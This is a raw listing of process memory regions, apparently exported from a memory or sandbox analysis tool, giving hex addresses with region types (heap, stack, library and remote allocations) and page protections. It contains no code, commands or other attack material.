page read and write
296B38AF000
trusted library allocation
page read and write
7FF7C0F7C000
trusted library allocation
page execute and read and write
1A944BB5000
heap
page read and write
6DF0000
trusted library allocation
page read and write
2F67000
trusted library allocation
page read and write
205315A4000
trusted library allocation
page read and write
C1E000
stack
page read and write
1218000
heap
page read and write
2E313E1000
stack
page read and write
1A9568B6000
trusted library allocation
page read and write
147E000
stack
page read and write
1626000
trusted library allocation
page execute and read and write
20541B9A000
trusted library allocation
page read and write
5A7E000
stack
page read and write
2FB9000
trusted library allocation
page read and write
6089000
heap
page read and write
400000
remote allocation
page execute and read and write
5A60000
trusted library allocation
page execute and read and write
154F5A75000
trusted library allocation
page read and write
308F000
stack
page read and write
2052F9A0000
heap
page read and write
4258000
trusted library allocation
page read and write
3BA7000
trusted library allocation
page read and write
49E5000
trusted library allocation
page read and write
527E000
stack
page read and write
63D5607000
stack
page read and write
28C03FE000
stack
page read and write
20531524000
trusted library allocation
page read and write
30F9000
trusted library allocation
page read and write
57D0000
trusted library allocation
page read and write
2A20000
trusted library allocation
page read and write
28628FE000
stack
page read and write
1622000
trusted library allocation
page read and write
5920000
trusted library allocation
page read and write
2BC7000
trusted library allocation
page read and write
5860000
heap
page read and write
D6E000
heap
page read and write
4F00000
heap
page execute and read and write
6010000
heap
page read and write
588E000
heap
page read and write
215E87E8000
trusted library allocation
page read and write
7FF7C1230000
trusted library allocation
page read and write
DB4097F000
stack
page read and write
1B804767000
heap
page read and write
20541699000
trusted library allocation
page read and write
29A71EC0000
heap
page read and write
DB40A79000
stack
page read and write
447C000
trusted library allocation
page read and write
2053158A000
trusted library allocation
page read and write
1469000
heap
page read and write
30CE000
stack
page read and write
1A956D30000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
1A9464F0000
heap
page execute and read and write
49C0000
trusted library allocation
page read and write
47B7000
trusted library allocation
page read and write
32B5000
trusted library allocation
page read and write
547E000
stack
page read and write
215E6E30000
trusted library section
page read and write
5FE0000
trusted library allocation
page execute and read and write
E02000
unkown
page readonly
58B0000
trusted library allocation
page read and write
205319A8000
trusted library allocation
page read and write
2763F8B0000
trusted library allocation
page read and write
2054179C000
trusted library allocation
page read and write
1A94695A000
trusted library allocation
page read and write
2763F870000
heap
page read and write
32B7000
trusted library allocation
page read and write
63D570C000
stack
page read and write
20541B6D000
trusted library allocation
page read and write
30BC000
trusted library allocation
page read and write
F24000
trusted library allocation
page read and write
61D0000
heap
page read and write
FFE000
stack
page read and write
56D0000
trusted library allocation
page execute and read and write
4DED000
stack
page read and write
117D000
heap
page read and write
63D47B6000
stack
page read and write
D8D81FE000
stack
page read and write
215E8874000
trusted library allocation
page read and write
10B7000
heap
page read and write
3BA1000
trusted library allocation
page read and write
5D65000
heap
page read and write
2053186A000
trusted library allocation
page read and write
215E89BB000
trusted library allocation
page read and write
21580092000
heap
page read and write
1B804689000
heap
page read and write
53CE000
stack
page read and write
2054182C000
trusted library allocation
page read and write
2C35000
trusted library allocation
page read and write
F40000
trusted library allocation
page read and write
215E8750000
trusted library allocation
page read and write
12D525F0000
heap
page read and write
1A946A61000
trusted library allocation
page read and write
570E000
heap
page read and write
2763F915000
heap
page read and write
C20000
heap
page read and write
141B000
trusted library allocation
page execute and read and write
F33000
trusted library allocation
page read and write
2740F140000
heap
page read and write
FA7000
trusted library allocation
page read and write
E1A8BCF000
stack
page read and write
392D000
trusted library allocation
page read and write
6BA4000
trusted library allocation
page read and write
2053170E000
trusted library allocation
page read and write
2B54000
trusted library allocation
page read and write
10CE000
stack
page read and write
2AE0000
trusted library allocation
page read and write
1011000
trusted library allocation
page read and write
346C000
trusted library allocation
page read and write
2A9B000
trusted library allocation
page read and write
E1A9FCD000
stack
page read and write
2AC5000
trusted library allocation
page read and write
63D473E000
stack
page read and write
188F000
stack
page read and write
BF0000
heap
page read and write
296B2BB0000
heap
page read and write
29CE000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
140492000
remote allocation
page execute and read and write
1400000
trusted library allocation
page read and write
4F8E000
stack
page read and write
154E3E20000
trusted library allocation
page read and write
54DE000
stack
page read and write
BC0000
heap
page read and write
47A7000
trusted library allocation
page read and write
1030000
heap
page read and write
568E000
stack
page read and write
28C07FD000
stack
page read and write
215E9048000
trusted library allocation
page read and write
A83BFE000
stack
page read and write
1619000
trusted library allocation
page read and write
1A95685B000
trusted library allocation
page read and write
DB40CFC000
stack
page read and write
FF0000
trusted library allocation
page read and write
154E606F000
trusted library allocation
page read and write
20531517000
trusted library allocation
page read and write
1A94678F000
trusted library allocation
page read and write
1A946721000
trusted library allocation
page read and write
3107000
trusted library allocation
page read and write
5510000
heap
page execute and read and write
F80000
heap
page read and write
75D0000
trusted library allocation
page read and write
5500000
trusted library allocation
page read and write
5EBD000
heap
page read and write
57E0000
heap
page execute and read and write
54D0000
heap
page execute and read and write
1460000
heap
page read and write
2053183B000
trusted library allocation
page read and write
2B26000
trusted library allocation
page read and write
3276000
trusted library allocation
page read and write
1404FC000
remote allocation
page execute and read and write
CFA000
heap
page read and write
215E8566000
trusted library allocation
page read and write
606B000
heap
page read and write
D10000
heap
page read and write
29CC000
trusted library allocation
page read and write
20541653000
trusted library allocation
page read and write
5A39000
trusted library allocation
page read and write
BA5000
heap
page read and write
1A956BC5000
trusted library allocation
page read and write
4CBB000
trusted library allocation
page read and write
DB40EF9000
stack
page read and write
CEB000
trusted library allocation
page execute and read and write
53FE000
stack
page read and write
1A956C8B000
trusted library allocation
page read and write
7FF7C1181000
trusted library allocation
page read and write
5970000
trusted library allocation
page read and write
49D3000
trusted library allocation
page read and write
1417000
trusted library allocation
page execute and read and write
5710000
trusted library allocation
page read and write
2F85000
trusted library allocation
page read and write
7FF7C0F60000
trusted library allocation
page read and write
1404F5000
remote allocation
page execute and read and write
2DA8000
trusted library allocation
page read and write
5D70000
heap
page read and write
5ECB000
heap
page read and write
56DE000
stack
page read and write
E1AA1CC000
stack
page read and write
CCD000
trusted library allocation
page execute and read and write
1620000
trusted library allocation
page read and write
3431000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
5CD4000
trusted library allocation
page read and write
2AB1000
trusted library allocation
page read and write
154E3DB0000
heap
page read and write
20541B0C000
trusted library allocation
page read and write
704E000
stack
page read and write
1A9568EB000
trusted library allocation
page read and write
E9C000
stack
page read and write
2C33000
trusted library allocation
page read and write
2DF9000
trusted library allocation
page read and write
7FF7C11C0000
trusted library allocation
page read and write
5840000
trusted library allocation
page execute and read and write
5A3E000
stack
page read and write
7480000
trusted library allocation
page read and write
F52000
trusted library allocation
page read and write
D47000
heap
page read and write
2052F7A0000
heap
page read and write
296B4D2F000
trusted library allocation
page read and write
F3D000
trusted library allocation
page execute and read and write
1210000
heap
page read and write
1B80697A000
trusted library allocation
page read and write
154FE120000
heap
page read and write
1404F3000
remote allocation
page execute and read and write
2B24000
trusted library allocation
page read and write
5D6D000
heap
page read and write
15C7000
trusted library allocation
page execute and read and write
56DD000
heap
page read and write
20541BF7000
trusted library allocation
page read and write
215F77E1000
trusted library allocation
page read and write
5749000
trusted library allocation
page read and write
7FF7C0F6D000
trusted library allocation
page execute and read and write
6F4E000
stack
page read and write
5770000
trusted library allocation
page read and write
296B2CB1000
heap
page read and write
7890000
trusted library allocation
page read and write
6049000
heap
page read and write
14EE000
stack
page read and write
1650000
trusted library allocation
page execute and read and write
29A10001000
trusted library allocation
page read and write
608F000
heap
page read and write
B14000
unkown
page readonly
588D000
trusted library allocation
page read and write
2EDE000
stack
page read and write
75B0000
trusted library allocation
page read and write
140A000
trusted library allocation
page execute and read and write
5930000
trusted library allocation
page read and write
28BF7FE000
stack
page read and write
F30000
heap
page read and write
1A946812000
trusted library allocation
page read and write
154E4150000
heap
page read and write
63D550E000
stack
page read and write
20541B19000
trusted library allocation
page read and write
49BB000
trusted library allocation
page read and write
2B29000
trusted library allocation
page read and write
5D68000
heap
page read and write
215E7A09000
trusted library allocation
page read and write
33C2000
trusted library allocation
page read and write
20531559000
trusted library allocation
page read and write
2DD8000
trusted library allocation
page read and write
296B2CE9000
heap
page read and write
BA0000
heap
page read and write
1050000
heap
page read and write
215E7CAF000
trusted library allocation
page read and write
2763F830000
heap
page read and write
296B4415000
trusted library allocation
page read and write
2B77000
trusted library allocation
page read and write
33CC000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
215E77D0000
heap
page execute and read and write
36E2000
trusted library allocation
page read and write
29ED000
trusted library allocation
page read and write
3E91000
trusted library allocation
page read and write
2B3B000
trusted library allocation
page read and write
7FF7C0F40000
trusted library allocation
page read and write
1153000
trusted library allocation
page execute and read and write
215E6EC4000
heap
page read and write
7FF7C11A0000
trusted library allocation
page read and write
128E000
stack
page read and write
2763F6C4000
heap
page read and write
E1A8E7F000
stack
page read and write
49BE000
trusted library allocation
page read and write
14047F000
remote allocation
page execute and read and write
28BF3FE000
stack
page read and write
51D0000
heap
page execute and read and write
5860000
trusted library allocation
page execute and read and write
55DE000
stack
page read and write
342E000
trusted library allocation
page read and write
597B000
trusted library allocation
page read and write
29A71DE9000
heap
page read and write
2AB7000
trusted library allocation
page read and write
154FE17A000
heap
page read and write
5D20000
trusted library allocation
page execute and read and write
513F000
stack
page read and write
6510000
trusted library allocation
page read and write
41C1000
trusted library allocation
page read and write
323C000
trusted library allocation
page read and write
45FC000
trusted library allocation
page read and write
205416C3000
trusted library allocation
page read and write
30EA000
trusted library allocation
page read and write
1A95698A000
trusted library allocation
page read and write
296B453E000
trusted library allocation
page read and write
1A946A3A000
trusted library allocation
page read and write
2052F9EC000
heap
page read and write
30E0000
trusted library allocation
page read and write
310B000
trusted library allocation
page read and write
2054177E000
trusted library allocation
page read and write
2B6D000
trusted library allocation
page read and write
D8D8DFE000
stack
page read and write
2B58000
trusted library allocation
page read and write
7FF7C0F2D000
trusted library allocation
page execute and read and write
1030000
heap
page read and write
1404C8000
remote allocation
page execute and read and write
7FF7C0F5D000
trusted library allocation
page execute and read and write
30D0000
trusted library allocation
page read and write
7FF7C10F0000
trusted library allocation
page read and write
1A946819000
trusted library allocation
page read and write
7FF7C1200000
trusted library allocation
page read and write
12D52700000
heap
page read and write
2DE0000
trusted library allocation
page read and write
5890000
heap
page execute and read and write
2F70000
trusted library allocation
page read and write
49F0000
trusted library allocation
page read and write
7D0000
heap
page read and write
2BAC000
trusted library allocation
page read and write
1A946B41000
trusted library allocation
page read and write
1A9467D7000
trusted library allocation
page read and write
7FF7C1190000
trusted library allocation
page read and write
2DBE000
stack
page read and write
74D0000
trusted library allocation
page read and write
1428000
heap
page read and write
2763F910000
heap
page read and write
5FC1000
heap
page read and write
20541A9A000
trusted library allocation
page read and write
1A956CF2000
trusted library allocation
page read and write
570C000
trusted library allocation
page read and write
126C000
heap
page read and write
215E8A89000
trusted library allocation
page read and write
215E8BA6000
trusted library allocation
page read and write
28BDFFF000
stack
page read and write
29E7000
trusted library allocation
page read and write
2971000
trusted library allocation
page read and write
5A5E000
stack
page read and write
5500000
trusted library allocation
page read and write
29A71E31000
heap
page read and write
2D91000
trusted library allocation
page read and write
2A9E000
trusted library allocation
page read and write
205313BE000
heap
page read and write
154E3E8B000
heap
page read and write
5879000
heap
page read and write
CB3000
trusted library allocation
page execute and read and write
2763F8F0000
heap
page read and write
2E59000
trusted library allocation
page read and write
42B8000
trusted library allocation
page read and write
140799000
remote allocation
page execute and read and write
F36000
trusted library allocation
page read and write
1040000
trusted library allocation
page execute and read and write
27640B21000
trusted library allocation
page read and write
1515000
heap
page read and write
205418E6000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
14AE000
stack
page read and write
1B8049C0000
heap
page read and write
2F65000
trusted library allocation
page read and write
7FF7C1060000
trusted library allocation
page execute and read and write
1A95680A000
trusted library allocation
page read and write
20541767000
trusted library allocation
page read and write
BB0000
heap
page read and write
2BA1000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
7FF7C0FF6000
trusted library allocation
page read and write
2C1E000
trusted library allocation
page read and write
2053167A000
trusted library allocation
page read and write
2F33000
trusted library allocation
page read and write
1A946A4E000
trusted library allocation
page read and write
447C000
trusted library allocation
page read and write
1A94668F000
trusted library allocation
page read and write
2F2D000
trusted library allocation
page read and write
28BFBFE000
stack
page read and write
CB4000
trusted library allocation
page read and write
1A946B27000
trusted library allocation
page read and write
5AA2000
trusted library allocation
page read and write
2E327FF000
stack
page read and write
58A0000
trusted library allocation
page execute and read and write
28BFFFE000
stack
page read and write
2AF9000
trusted library allocation
page read and write
11B8000
heap
page read and write
215E6E80000
heap
page read and write
9D0000
unkown
page readonly
20541B44000
trusted library allocation
page read and write
2B6F000
trusted library allocation
page read and write
2DF5000
trusted library allocation
page read and write
2B75000
trusted library allocation
page read and write
1143000
heap
page read and write
1A95697B000
trusted library allocation
page read and write
A847FD000
stack
page read and write
6300000
trusted library allocation
page read and write
1A956C5F000
trusted library allocation
page read and write
1A956CE9000
trusted library allocation
page read and write
205313B8000
heap
page read and write
2FE1000
trusted library allocation
page read and write
20541B49000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
52DE000
stack
page read and write
29A71FE0000
heap
page read and write
2960000
heap
page read and write
215E6E10000
heap
page read and write
B6D000
trusted library allocation
page execute and read and write
1A946767000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
30EB000
trusted library allocation
page read and write
2DDC000
trusted library allocation
page read and write
154FE7F0000
heap
page read and write
154F5C27000
trusted library allocation
page read and write
205313BB000
heap
page read and write
134E000
stack
page read and write
589A000
trusted library allocation
page read and write
2DF3000
trusted library allocation
page read and write
1A9567F7000
trusted library allocation
page read and write
12A1000
heap
page read and write
7FF7C0F64000
trusted library allocation
page read and write
E1AA04B000
stack
page read and write
9D2000
unkown
page readonly
14048F000
remote allocation
page execute and read and write
7FF7C10F0000
trusted library allocation
page execute and read and write
2F40000
trusted library allocation
page read and write
554E000
stack
page read and write
5F6B000
heap
page read and write
1A946A85000
trusted library allocation
page read and write
75C000
stack
page read and write
2F2B000
trusted library allocation
page read and write
215E87DA000
trusted library allocation
page read and write
5940000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
7C0000
heap
page read and write
29A73B50000
heap
page execute and read and write
1670000
trusted library allocation
page read and write
2F12000
trusted library allocation
page read and write
5880000
trusted library allocation
page read and write
5C30000
trusted library allocation
page execute and read and write
EF7000
stack
page read and write
E1A947E000
stack
page read and write
D8D89FE000
stack
page read and write
DB408FF000
stack
page read and write
5550000
trusted library allocation
page read and write
1020000
trusted library allocation
page read and write
12D50C6E000
heap
page read and write
296B4687000
trusted library allocation
page read and write
3105000
trusted library allocation
page read and write
1A9567A4000
trusted library allocation
page read and write
48B3000
trusted library allocation
page read and write
2BC3000
trusted library allocation
page read and write
1600000
trusted library allocation
page read and write
18FC000
heap
page read and write
5A80000
trusted library allocation
page execute and read and write
CA6000
heap
page read and write
5D82000
heap
page read and write
1690000
heap
page read and write
FCB000
trusted library allocation
page read and write
2740D680000
direct allocation
page execute read
2763F8E0000
heap
page readonly
DB40F7E000
stack
page read and write
161A000
trusted library allocation
page execute and read and write
5AD0000
trusted library allocation
page read and write
2F44000
trusted library allocation
page read and write
465C000
trusted library allocation
page read and write
63D4B3B000
stack
page read and write
75F9000
trusted library allocation
page read and write
A843FE000
stack
page read and write
7FF7C0FF0000
trusted library allocation
page read and write
296B3320000
heap
page read and write
2A96000
trusted library allocation
page read and write
4497000
trusted library allocation
page read and write
29A71DEC000
heap
page read and write
D8D7DFE000
stack
page read and write
5AA0000
trusted library allocation
page read and write
2B18000
trusted library allocation
page read and write
296B4B62000
trusted library allocation
page read and write
2763F664000
heap
page read and write
D8D79FD000
stack
page read and write
2DA4000
trusted library allocation
page read and write
2DAE000
trusted library allocation
page read and write
12D50BE0000
heap
page read and write
1A956A1E000
trusted library allocation
page read and write
215E6E50000
trusted library section
page read and write
1A956AA1000
trusted library allocation
page read and write
215E76D6000
heap
page read and write
29D2000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
1A946674000
trusted library allocation
page read and write
DA4000
heap
page read and write
514E000
stack
page read and write
11E6000
heap
page read and write
1766000
heap
page read and write
D62000
heap
page read and write
5D50000
trusted library allocation
page read and write
12D50C20000
heap
page read and write
540E000
stack
page read and write
59E0000
trusted library allocation
page read and write
5D10000
trusted library allocation
page read and write
215E6E92000
heap
page read and write
30A1000
trusted library allocation
page read and write
20541BDF000
trusted library allocation
page read and write
1A94692D000
trusted library allocation
page read and write
2950000
trusted library allocation
page read and write
1A9467C3000
trusted library allocation
page read and write
215E6EC2000
heap
page read and write
1A956511000
trusted library allocation
page read and write
29A73A20000
heap
page read and write
2E32FFF000
stack
page read and write
49B0000
trusted library allocation
page read and write
1070000
heap
page read and write
15FF000
stack
page read and write
E1A91F9000
stack
page read and write
1A9567C6000
trusted library allocation
page read and write
205317D1000
trusted library allocation
page read and write
5F69000
trusted library allocation
page read and write
1A946420000
trusted library section
page read and write
162E000
stack
page read and write
5CCE000
stack
page read and write
B63000
trusted library allocation
page execute and read and write
13AF000
stack
page read and write
7450000
trusted library allocation
page read and write
30BE000
trusted library allocation
page read and write
205318E4000
trusted library allocation
page read and write
5AD0000
heap
page read and write
63D467D000
stack
page read and write
30F0000
trusted library allocation
page read and write
571E000
stack
page read and write
3000000
trusted library allocation
page read and write
205317EB000
trusted library allocation
page read and write
F0F000
stack
page read and write
D38000
heap
page read and write
193C000
stack
page read and write
215E83E4000
trusted library allocation
page read and write
1622000
trusted library allocation
page read and write
12D50D1F000
heap
page read and write
3388000
trusted library allocation
page read and write
4480000
trusted library allocation
page read and write
D2B000
heap
page read and write
2763F68C000
heap
page read and write
2B1E000
trusted library allocation
page read and write
32B5000
trusted library allocation
page read and write
DF0000
unkown
page readonly
CC6000
trusted library allocation
page read and write
1594000
trusted library allocation
page read and write
5F2A000
heap
page read and write
58B0000
trusted library allocation
page execute and read and write
29A71EE0000
heap
page read and write
56A0000
trusted library allocation
page read and write
2763F810000
heap
page read and write
5E60000
heap
page read and write
2763F8D0000
trusted library allocation
page read and write
5780000
heap
page read and write
B60000
trusted library allocation
page read and write
296B2C3C000
heap
page read and write
1172000
trusted library allocation
page read and write
478F000
trusted library allocation
page read and write
1B8048B0000
trusted library allocation
page read and write
455C000
trusted library allocation
page read and write
58E0000
trusted library allocation
page read and write
63D493E000
stack
page read and write
2F80000
heap
page read and write
215E8AEA000
trusted library allocation
page read and write
29B1000
trusted library allocation
page read and write
68BF000
stack
page read and write
1407BF000
remote allocation
page execute and read and write
419B000
trusted library allocation
page read and write
2A8E000
stack
page read and write
5CE0000
heap
page read and write
2052F7D7000
heap
page read and write
BF5000
heap
page read and write
D7C000
heap
page read and write
296B415A000
trusted library allocation
page read and write
20541764000
trusted library allocation
page read and write
59C0000
trusted library allocation
page execute and read and write
2F37000
trusted library allocation
page read and write
21580050000
trusted library allocation
page read and write
DB40C78000
stack
page read and write
F98000
stack
page read and write
E3C000
stack
page read and write
296B3290000
trusted library allocation
page read and write
3554000
trusted library allocation
page read and write
154F5A61000
trusted library allocation
page read and write
3971000
trusted library allocation
page read and write
1A9469E8000
trusted library allocation
page read and write
296B4C48000
trusted library allocation
page read and write
2158018C000
heap
page read and write
5653000
heap
page read and write
296B3260000
heap
page read and write
6CC0000
trusted library allocation
page read and write
2C5C000
trusted library allocation
page read and write
20541BC1000
trusted library allocation
page read and write
7FF7C1160000
trusted library allocation
page read and write
4C9E000
stack
page read and write
215E76E6000
heap
page read and write
20541677000
trusted library allocation
page read and write
F9E000
stack
page read and write
58BB000
heap
page read and write
3977000
trusted library allocation
page read and write
2DFB000
trusted library allocation
page read and write
F38000
stack
page read and write
1A94664D000
trusted library allocation
page read and write
1A956D11000
trusted library allocation
page read and write
1066000
heap
page read and write
2B05000
trusted library allocation
page read and write
30A9000
trusted library allocation
page read and write
60D2000
heap
page read and write
215E8A31000
trusted library allocation
page read and write
5AB0000
trusted library allocation
page read and write
154E3E50000
heap
page read and write
1000000
heap
page execute and read and write
215E8903000
trusted library allocation
page read and write
286215C000
stack
page read and write
7FF7C0F4B000
trusted library allocation
page execute and read and write
1510000
heap
page read and write
13E3000
trusted library allocation
page execute and read and write
1470000
heap
page read and write
20541633000
trusted library allocation
page read and write
5570000
trusted library allocation
page read and write
6BA0000
trusted library allocation
page read and write
A837FE000
stack
page read and write
578E000
stack
page read and write
2F6B000
trusted library allocation
page read and write
2DDA000
trusted library allocation
page read and write
154FE186000
heap
page read and write
C7331E1000
stack
page read and write
215E766B000
heap
page read and write
1A956A92000
trusted library allocation
page read and write
54FE000
stack
page read and write
2941000
trusted library allocation
page read and write
B3E000
stack
page read and write
3110000
trusted library allocation
page read and write
28629FF000
stack
page read and write
D8D69ED000
stack
page read and write
326A000
trusted library allocation
page read and write
2C52000
trusted library allocation
page read and write
2D93000
trusted library allocation
page read and write
573E000
stack
page read and write
1A944950000
heap
page read and write
296B33E1000
trusted library allocation
page read and write
1404E9000
remote allocation
page execute and read and write
7FF7C1178000
trusted library allocation
page read and write
6CE4000
trusted library allocation
page read and write
27640965000
trusted library allocation
page read and write
1632000
trusted library allocation
page read and write
54C0000
trusted library allocation
page read and write
2E31FFF000
stack
page read and write
B9B000
trusted library allocation
page execute and read and write
12D4000
heap
page read and write
1A95689D000
trusted library allocation
page read and write
4471000
trusted library allocation
page read and write
2052F9E5000
heap
page read and write
16F6000
heap
page read and write
205319B5000
trusted library allocation
page read and write
30F4000
trusted library allocation
page read and write
205316C9000
trusted library allocation
page read and write
29A71C10000
unkown
page readonly
1404CF000
remote allocation
page execute and read and write
29B5000
trusted library allocation
page read and write
215E83DE000
trusted library allocation
page read and write
296B2DF5000
heap
page read and write
29A71DCC000
heap
page read and write
154E3F22000
heap
page read and write
3100000
trusted library allocation
page execute and read and write
154E3EB5000
heap
page read and write
63D45FA000
stack
page read and write
519E000
stack
page read and write
2AD0000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
BB5000
heap
page read and write
568D000
heap
page read and write
305C000
stack
page read and write
1597000
heap
page read and write
A833FD000
stack
page read and write
1A956833000
trusted library allocation
page read and write
1A9568C5000
trusted library allocation
page read and write
215E6EE0000
heap
page read and write
2763F649000
heap
page read and write
14E0000
heap
page read and write
59A0000
trusted library allocation
page read and write
2C5A000
trusted library allocation
page read and write
2F88000
trusted library allocation
page read and write
58B0000
trusted library allocation
page read and write
2B56000
trusted library allocation
page read and write
1B804890000
trusted library allocation
page read and write
60ED000
heap
page read and write
1407A1000
remote allocation
page execute and read and write
1406000
trusted library allocation
page execute and read and write
F8E000
trusted library allocation
page read and write
205416AA000
trusted library allocation
page read and write
2E31BFE000
stack
page read and write
5FE5000
heap
page read and write
E1A8B82000
stack
page read and write
BAC000
stack
page read and write
1A944A0C000
heap
page read and write
2F70000
trusted library allocation
page read and write
215E87E4000
trusted library allocation
page read and write
20541663000
trusted library allocation
page read and write
28BDBEC000
stack
page read and write
20541739000
trusted library allocation
page read and write
3486000
trusted library allocation
page read and write
3221000
trusted library allocation
page read and write
3242000
trusted library allocation
page read and write
296B2C2E000
heap
page read and write
5EDF000
heap
page read and write
74C0000
trusted library allocation
page read and write
215E6E60000
trusted library allocation
page read and write
129F000
heap
page read and write
44D1000
trusted library allocation
page read and write
1A946A47000
trusted library allocation
page read and write
59E0000
trusted library allocation
page read and write
215E74AC000
heap
page read and write
29A71E2A000
heap
page read and write
20541792000
trusted library allocation
page read and write
20541BE8000
trusted library allocation
page read and write
5E9A000
heap
page read and write
2740D660000
heap
page read and write
20531680000
trusted library allocation
page read and write
DB40AFE000
stack
page read and write
F90000
trusted library allocation
page read and write
1A9467F0000
trusted library allocation
page read and write
54BD000
stack
page read and write
2763F640000
heap
page read and write
41F2000
trusted library allocation
page read and write
7FF7C11E0000
trusted library allocation
page read and write
2054191D000
trusted library allocation
page read and write
7FF4B94A0000
trusted library allocation
page execute and read and write
DB40D7A000
stack
page read and write
2F35000
trusted library allocation
page read and write
2F4A000
trusted library allocation
page read and write
E1AA14C000
stack
page read and write
1404C9000
remote allocation
page execute and read and write
205417FB000
trusted library allocation
page read and write
2158014B000
heap
page read and write
215E8F62000
trusted library allocation
page read and write
2E317FF000
stack
page read and write
3334000
trusted library allocation
page read and write
C734DFE000
stack
page read and write
53BE000
stack
page read and write
2053154C000
trusted library allocation
page read and write
7FF7C1150000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
296B2C38000
heap
page read and write
2BCD000
trusted library allocation
page read and write
E9C000
stack
page read and write
564F000
stack
page read and write
1A9467BD000
trusted library allocation
page read and write
20541A15000
trusted library allocation
page read and write
215E7620000
heap
page read and write
85330FC000
stack
page read and write
BBE000
stack
page read and write
29B9000
trusted library allocation
page read and write
2D89000
trusted library allocation
page read and write
F8B000
trusted library allocation
page read and write
323B000
trusted library allocation
page read and write
2E4B000
trusted library allocation
page read and write
10D3000
heap
page read and write
CB0000
trusted library allocation
page read and write
571E000
stack
page read and write
74E0000
trusted library allocation
page read and write
1A946920000
trusted library allocation
page read and write
7FF7C1240000
trusted library allocation
page read and write
215E7030000
heap
page read and write
205317B6000
trusted library allocation
page read and write
5D59000
heap
page read and write
2AA0000
trusted library allocation
page read and write
34C1000
trusted library allocation
page read and write
1A94670D000
trusted library allocation
page read and write
441C000
trusted library allocation
page read and write
2054198B000
trusted library allocation
page read and write
E1A9378000
stack
page read and write
B73000
trusted library allocation
page read and write
1A944BBB000
heap
page read and write
1660000
heap
page read and write
29A0060A000
trusted library allocation
page read and write
1436000
heap
page read and write
B7E000
stack
page read and write
F42000
trusted library allocation
page read and write
309D000
trusted library allocation
page read and write
7FF7C0F44000
trusted library allocation
page read and write
2C56000
trusted library allocation
page read and write
D54000
heap
page read and write
296B3360000
trusted library allocation
page read and write
215801DB000
heap
page read and write
2AB3000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
30D7000
trusted library allocation
page read and write
4757000
trusted library allocation
page read and write
27640139000
trusted library allocation
page read and write
5740000
trusted library allocation
page read and write
C733DFF000
stack
page read and write
2052FA70000
heap
page read and write
6192000
heap
page read and write
2FDC000
trusted library allocation
page read and write
154FE220000
heap
page execute and read and write
2C24000
trusted library allocation
page read and write
1404D7000
remote allocation
page execute and read and write
29F2000
trusted library allocation
page read and write
2C58000
trusted library allocation
page read and write
2EC0000
trusted library allocation
page read and write
CA0000
trusted library allocation
page read and write
2054185F000
trusted library allocation
page read and write
5F3C000
heap
page read and write
2DFE000
stack
page read and write
5859000
trusted library allocation
page read and write
F57000
trusted library allocation
page execute and read and write
5AE0000
trusted library allocation
page read and write
1450000
heap
page read and write
5F80000
trusted library allocation
page execute and read and write
1600000
trusted library allocation
page read and write
5A30000
trusted library allocation
page execute and read and write
7D0000
heap
page read and write
13F3000
trusted library allocation
page read and write
1A956CD7000
trusted library allocation
page read and write
2054199D000
trusted library allocation
page read and write
1A94661D000
trusted library allocation
page read and write
29A71C12000
unkown
page readonly
60E6000
heap
page read and write
CD0000
trusted library allocation
page read and write
215801E7000
heap
page read and write
7FF7C0FE0000
trusted library allocation
page execute and read and write
14D9000
heap
page read and write
2A90000
trusted library allocation
page read and write
11B0000
heap
page read and write
154E4120000
heap
page read and write
29A73B90000
trusted library allocation
page read and write
5310000
trusted library allocation
page read and write
1630000
trusted library allocation
page read and write
D60000
heap
page read and write
63D4273000
stack
page read and write
27640B18000
trusted library allocation
page read and write
5F40000
trusted library allocation
page read and write
5EFC000
heap
page read and write
12D5280B000
heap
page read and write
5820000
heap
page read and write
63D568D000
stack
page read and write
D20000
heap
page read and write
296B3462000
trusted library allocation
page read and write
2DED000
trusted library allocation
page read and write
2D76000
trusted library allocation
page read and write
2BB5000
trusted library allocation
page read and write
296B42D1000
trusted library allocation
page read and write
2740F145000
heap
page read and write
2B50000
trusted library allocation
page read and write
29A74720000
heap
page read and write
14B0000
heap
page read and write
D10000
trusted library allocation
page execute and read and write
7FD70000
trusted library allocation
page execute and read and write
29EF000
trusted library allocation
page read and write
2E323FC000
stack
page read and write
1A94694D000
trusted library allocation
page read and write
1B8046EA000
heap
page read and write
D2E000
heap
page read and write
561E000
stack
page read and write
B8A000
trusted library allocation
page execute and read and write
C7341FC000
stack
page read and write
215E7010000
trusted library allocation
page read and write
2763FD80000
trusted library allocation
page read and write
1A956C57000
trusted library allocation
page read and write
7FF7C10D0000
trusted library allocation
page execute and read and write
D8D91FE000
stack
page read and write
5BFE000
stack
page read and write
B86000
trusted library allocation
page execute and read and write
E1A907F000
stack
page read and write
5670000
trusted library allocation
page read and write
5870000
trusted library allocation
page read and write
296B3609000
trusted library allocation
page read and write
154F5CFE000
trusted library allocation
page read and write
7FF7C113B000
trusted library allocation
page read and write
11D9000
heap
page read and write
5580000
trusted library allocation
page read and write
205319D8000
trusted library allocation
page read and write
2B7E000
trusted library allocation
page read and write
14F0000
heap
page read and write
29A10021000
trusted library allocation
page read and write
56FF000
stack
page read and write
577D000
trusted library allocation
page read and write
7640000
trusted library allocation
page execute and read and write
1B806371000
trusted library allocation
page read and write
5890000
trusted library allocation
page read and write
DB41BCC000
stack
page read and write
58F0000
trusted library allocation
page execute and read and write
5540000
trusted library allocation
page read and write
5AA0000
trusted library allocation
page read and write
154E4155000
heap
page read and write
18E0000
trusted library allocation
page read and write
2B0B000
trusted library allocation
page read and write
30EC000
trusted library allocation
page read and write
140490000
remote allocation
page execute and read and write
6072000
heap
page read and write
21580183000
heap
page read and write
7FF7C0F23000
trusted library allocation
page execute and read and write
5B7E000
stack
page read and write
63D49BF000
stack
page read and write
215E6DB0000
heap
page read and write
FD9000
trusted library allocation
page read and write
A82BFF000
stack
page read and write
5E7E000
heap
page read and write
296B4397000
trusted library allocation
page read and write
12D526F5000
heap
page read and write
A82FFE000
stack
page read and write
3214000
